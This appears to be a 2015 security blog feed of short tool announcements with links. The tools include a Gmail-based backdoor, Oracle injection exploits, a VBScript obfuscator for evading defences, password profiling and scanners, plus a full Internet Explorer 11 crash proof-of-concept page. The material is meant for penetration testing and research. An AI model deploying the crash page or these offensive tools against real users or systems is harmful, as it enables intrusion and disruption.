Jun 10, 2015

VDO: OWASP AppSec EU 2015

https://www.its.fh-muenster.de/owasp-appseceu/2015/

Tools: Gcat - A fully featured backdoor that uses Gmail as a C&C server

A stealthy Python based backdoor that uses Gmail as a command and control server

Source:: https://github.com/byt3bl33d3r/gcat

Tools: ora-exploits-evilcursor

Oracle Evil cursor injection exploits repository - Perl & SQL version

Source:: https://github.com/bunk3r/ora-exploits-evilcursor/

Tools: Microsoft Internet Explorer 11 Crash PoC By h0wl's blog

<html>
<head>
<meta http-equiv="Cache-Control" content="no-cache"/>
<script>
function boom() {
var divA = document.createElement("div");
document.body.appendChild(divA);
try {
//divA.contentEditable = "true";
divA.outerHTML = "AAAA";
var context = divA['msGetInputContext']();
}
catch (exception) {
}
}
</script>
</head>
<body onload='boom();'>
</body>
</html
 

Jun 9, 2015

Howto: Upgrade security package only in Debian, Ubuntu

1. Grep the security repository from repository list
# grep security /etc/apt/sources.list

2. Install the package that list from security repository
# apt-get upgrade -oDir::Etc::SourceList=/tmp/security.list

Jun 8, 2015

Tools: TLScan - Pure python, SSL/TLS protocol and cipher scanner/enumerator.

'Pure' python script to enumerate SSL/TLS protocols and ciphers supported by a service. The script does not depend on libraries like OpenSSL

Source:: https://github.com/mjol/TLScan

Jun 7, 2015

Tools: Common User Passwords Profiler (CUPP)

The most common form of authentication is the combination of a username and a password or passphrase. If both match values stored within a locally stored table, the user is authenticated for a connection. Password strength is a measure of the difficulty involved in guessing or breaking the password through cryptographic techniques or library-based automated testing of alternate values.
A weak password might be very short or only use alphanumberic characters, making decryption simple. A weak password can also be one that is easily guessed by someone profiling the user, such as a birthday, nickname, address, name of a pet or relative, or a common word such as God, love, money or password.
That is why CUPP has born, and it can be used in situations like legal penetration tests or forensic crime investigations.
Source: https://github.com/Mebus/cupp

Tools: Mod_Wallz - Apache mod to mitigate Layer 7 DDoS attacks

I am creating this module for use of securing my server so that instead of using mod_security and mod_evasive, I have the 2 mods in this mod, and hopefully more powerful, this is only a small personal project, so if you wanna commit something you can, but I will usually deny the commit because the code on my computer is more updated than the commited one, but at the end it will be merged.

Source:: https://github.com/LolDatSec/mod_wallz

Tools: Crouton - Pentesting OS for Chrome Book

Crouton is a standlone tool that uses the chroot command to run Linux (Ubuntu, specifically) on top of Chrome OS (which is, in truth, just another flavor of Linux). As this is not dual-booting, switching between Chrome OS and Ubuntu is simple and speedy. No reboots are required which is really convenient. Also, there are nice keyboard shortcuts for switching between the two which makes the whole thing incredibly convenient.

Source:: https://warroom.securestate.com/index.php/crouton-chromebooks-as-a-pentesting-platform/

Tools: Malware Fragmentation Tool

Malware Fragmentation Tool its a tool that simply fragment the PE file and it can disassemble the PE file, etc this tool very useful for people who do malware research or analysis for pe_files
capstone disassembly engine used in this project for disassembling
Note that this tool is not finished yet and every time there will be an update.

Source:: https://github.com/motazreda/MalwareFragmentationTool

Tools: VBS-Obfuscator-in-Python - VBScript obfuscation to allow PenTesters bypass countermeasures.

VBS-Obfuscator-in-Python

VBScript obfuscation to allow PenTesters bypass countermeasures.

Source::
- http://seclist.us/vbscript-obfuscation-to-allow-pentesters-bypass-countermeasures.html
- https://github.com/kkar/VBS-Obfuscator-in-Python

Tools: Pcap2XML - Convert 802.11 Packets to XML and SQLITE

This tool converts 802.11 packet traces (PCAP format) into an XML and SQLITE equivalent so you can now run XPATH/XQUERY/SQL queries on the packets.

Why do we need this?


Wireshark is great when it comes to capturing and filtering packet traces. However, it has no facility for macro level tasks. Here are some answers which Wireshark cannot give you out of the box:


  • Give me all device MAC addresses in the PCAP
  • Give me a unique list of all Access Point/Ad-Hoc networks in the PCAP
  • ... 
Of course, this is by design. Wireshark is a packet capture tool and not a data analysis platform. 


This is where Pcap2XMl/Sqlite comes in! We map every header field in an 802.11 packet to an XML and SQLITE Equivalent. Once we convert every packet into these formats, it is extremely easy to run analysis tools on them as you shall see in latter part of this post.

Source:: http://hackoftheday.securitytube.net/2015/03/pcap2xmlsqlite-convert-80211-packets-to.html

Tools: NoSQL-Honeypot-Framework (NoPo)

NoSQL-Honeypot-Framework (NoPo) is an open source honeypot for nosql databases that automates the process of detecting attackers,logging attack incidents. The simulation engines are deployed using the twisted framework.Currently the framework holds support for redis.

Source:: https://github.com/torque59/nosqlpot/